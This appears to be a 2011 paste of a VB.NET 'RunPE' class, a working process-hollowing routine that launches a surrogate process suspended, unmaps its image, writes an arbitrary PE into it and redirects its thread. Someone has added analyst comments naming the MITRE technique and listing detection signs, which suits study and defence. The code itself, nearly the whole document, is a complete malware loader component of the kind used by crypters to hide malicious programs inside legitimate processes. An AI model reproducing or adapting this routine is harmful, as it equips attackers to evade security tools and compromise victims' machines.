InfinityExistz

RunPE vb.net

Dec 1st, 2011
  1. Imports System.Runtime.InteropServices
  2. Imports System.Text
  3.  
  4. Public Class x86
     ' Analyst summary: this class implements "RunPE", i.e. process hollowing (MITRE ATT&CK T1055.012).
     ' RunPE starts a surrogate process suspended, unmaps its original image, writes the PE held in
     ' a byte array into the surrogate and repoints the primary thread before resuming it.
     ' Every offset used below is for a 32-bit PE file and the x86 CONTEXT layout.
     ' Detection: a child created suspended that then receives NtUnmapViewOfSection, a cross-process
     ' VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory and SetThreadContext before
     ' ResumeThread; afterwards the in-memory image no longer matches the file on disk.
  5.  
     ' Page-protection lookup, indexed by the top three bits of a section's Characteristics
     ' (bit 29 execute, bit 30 read, bit 31 write). Values are Win32 PAGE_* constants:
     ' 1 NOACCESS, 16 EXECUTE, 2 READONLY, 32 EXECUTE_READ, 4 READWRITE, 64 EXECUTE_READWRITE.
  6.     Private Shared ReadOnly prot() As Integer = {1, 16, 2, 32, 4, 64, 4, 64}
  7.  
         ' P/Invoke declarations. SuppressUnmanagedCodeSecurity removes the runtime stack walk for
         ' unmanaged-code permission on these calls. Native structures are passed as raw arrays
         ' (Byte(), IntPtr(), UInteger()) instead of declared Structure types.
  8.     <System.Security.SuppressUnmanagedCodeSecurity()> _
  9.     Private Class Win32
  10.  
             ' Resumes the suspended primary thread of the surrogate.
  11.         <DllImport("kernel32")> Shared Function ResumeThread(ByVal hThr As IntPtr) As Integer
  12.         End Function
  13.  
             ' Creates the surrogate process; sInfo/pInfo stand in for STARTUPINFO/PROCESS_INFORMATION.
  14.         <DllImport("kernel32")> Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, _
  15.           ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, _
  16.           ByVal creation As Integer, ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo() As Byte, _
  17.           ByVal pInfo() As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  18.         End Function 'WORKING
  19.  
             ' Reads the thread's register context into a UInteger array (one slot per 4 bytes).
  20.         <DllImport("kernel32")> Shared Function GetThreadContext(ByVal hThr As IntPtr, _
  21.           ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  22.         End Function 'WORKING
  23.  
             ' Reads memory from the surrogate; the buffer is declared as a single IntPtr passed ByRef.
  24.         <DllImport("kernel32")> Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, _
  25.           ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  26.         End Function
  27.  
             ' Native API from ntdll that unmaps a mapped view (here: the surrogate's own image).
             ' Returns an NTSTATUS; the caller treats 0 as success.
  28.         <DllImport("ntdll")> Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  29.         End Function 'WORKING
  30.  
             ' Allocates memory inside another process.
  31.         <DllImport("kernel32")> Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, _
  32.           ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  33.         End Function 'WORKING ON NON .NET APPS
  34.  
             ' Writes a local byte array into another process's address space.
  35.         <DllImport("kernel32.dll", SetLastError:=True)> _
  36.         Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As System.UInt32, <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
  37.         End Function
  38.  
             ' Changes page protection on a region inside another process.
  39.         <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  40.         Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  41.         End Function
  42.  
             ' Writes a modified register context back to the suspended thread.
  43.         <DllImport("kernel32")> Shared Function SetThreadContext(ByVal hThr As IntPtr, _
  44.         ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  45.         End Function
  46.     End Class
  47.  
         ' Replaces the image of a newly created, suspended surrogate process with the PE in "bytes".
         '   bytes            - raw contents of a 32-bit PE file, parsed by fixed header offsets.
         '   surrogateProcess - command line handed to CreateProcess for the host process.
         ' Returns nothing; returns early only when CreateProcess fails. Results of the individual
         ' memory writes are stored in "res" but never inspected.
  48.     Public Shared Sub RunPE(ByVal bytes() As Byte, ByVal surrogateProcess As String)
             ' Offset 60 of the DOS header is e_lfanew, the file offset of the NT headers.
  49.         Dim offsetNtHeaders As Integer = BitConverter.ToInt32(bytes, 60)
             ' NT+6 is FileHeader.NumberOfSections; NT+84 is OptionalHeader.SizeOfHeaders.
  50.         Dim numberOfSections As Integer = BitConverter.ToInt16(bytes, offsetNtHeaders + 6)
  51.         Dim sizeOfHeaders As New IntPtr(BitConverter.ToInt32(bytes, offsetNtHeaders + 84))
             ' si: 68 zeroed bytes used as STARTUPINFO. pi: four pointer-sized slots used as
             ' PROCESS_INFORMATION; pi(0) is used below as the process handle, pi(1) as the thread handle.
  52.         Dim si(67) As Byte
  53.         Dim pi(3) As IntPtr
             ' Creation flag 4 is CREATE_SUSPENDED: the surrogate exists but has not run any code yet.
  54.         If Not Win32.CreateProcess(Nothing, New StringBuilder(surrogateProcess), Nothing, Nothing, _
  55.            False, 4, Nothing, Nothing, si, pi) Then Return
             ' 179 UInteger slots = 716 bytes, the size of the x86 CONTEXT structure.
             ' Slot 0 is ContextFlags; &H10002 requests the integer registers (CONTEXT_INTEGER).
  56.         Dim ctxt(178) As UInteger
  57.         ctxt(0) = &H10002
  58.         Dim base, junk, addr As IntPtr
  59.         Dim res As Boolean
  60.         Dim junk2 As Integer
  61.         If Win32.GetThreadContext(pi(1), ctxt) Then
                 ' ctxt(41) is byte offset 164 (Ebx in the x86 CONTEXT). For a suspended new process Ebx
                 ' holds the PEB address, and PEB+8 is ImageBaseAddress; this reads the current image base.
  62.             If Win32.ReadProcessMemory(pi(0), New IntPtr(ctxt(41) + 8), addr, New IntPtr(4), junk) Then
                     ' Unmapping the surrogate's own image is the defining step of process hollowing.
  63.                 If Win32.NtUnmapViewOfSection(pi(0), addr) = 0 Then
                         ' Allocate at the PE's preferred ImageBase (NT+52) for SizeOfImage bytes (NT+80).
                         ' 12288 = MEM_COMMIT Or MEM_RESERVE; 64 = PAGE_EXECUTE_READWRITE.
  64.                     base = Win32.VirtualAllocEx(pi(0), New IntPtr(BitConverter.ToInt32(bytes, offsetNtHeaders + 52)), _
  65.                     New IntPtr(BitConverter.ToInt32(bytes, offsetNtHeaders + 80)), 12288, 64)
                         ' Copy the PE headers to the start of the new region.
  66.                     res = Win32.WriteProcessMemory(pi(0), base, bytes, sizeOfHeaders, junk)
  67.                     For i As Integer = 0 To numberOfSections - 1
                             ' One 40-byte section header, viewed as ten Int32 values. The section table is
                             ' taken to start at NT+248. Fields used: sh(2) VirtualSize, sh(3) VirtualAddress,
                             ' sh(4) SizeOfRawData, sh(5) PointerToRawData, sh(9) Characteristics.
  68.                         Dim sh(9) As Integer
  69.                         Buffer.BlockCopy(bytes, offsetNtHeaders + 248 + (i * 40), sh, 0, 40)
                             ' Copy the section's raw file data and write it at base + VirtualAddress.
  70.                         Dim raw(sh(4) - 1) As Byte
  71.                         Buffer.BlockCopy(bytes, sh(5), raw, 0, raw.Length)
  72.                         res = Win32.WriteProcessMemory(pi(0), New IntPtr(base.ToInt32 + sh(3)), raw, New IntPtr(raw.Length), junk)
                             ' Set per-section protection from the Characteristics bits via the prot table.
  73.                         res = Win32.VirtualProtectEx(pi(0), New IntPtr(base.ToInt32 + sh(3)), _
  74.                          New IntPtr(sh(2)), prot((sh(9) >> 29) And &H7), junk2)
  75.                     Next
                         ' Overwrite PEB.ImageBaseAddress (PEB+8) with the base of the written image.
  76.                     res = Win32.WriteProcessMemory(pi(0), New IntPtr(ctxt(41) + 8), BitConverter.GetBytes(base.ToInt32), _
  77.                     New IntPtr(4), junk)
                         ' ctxt(44) is byte offset 176 (Eax in the x86 CONTEXT), the register a suspended new
                         ' process uses for its start address; set to base + AddressOfEntryPoint (NT+40).
  78.                     ctxt(44) = CType(base.ToInt32 + BitConverter.ToInt32(bytes, offsetNtHeaders + 40), UInteger)
  79.                     Win32.SetThreadContext(pi(1), ctxt)
  80.                 End If
  81.             End If
  82.         End If
             ' The thread is resumed whether or not the steps above succeeded; if any of the nested
             ' checks failed, the surrogate simply continues with whatever image it has at that point.
  83.         Win32.ResumeThread(pi(1))
  84.     End Sub
  85.  
  86. End Class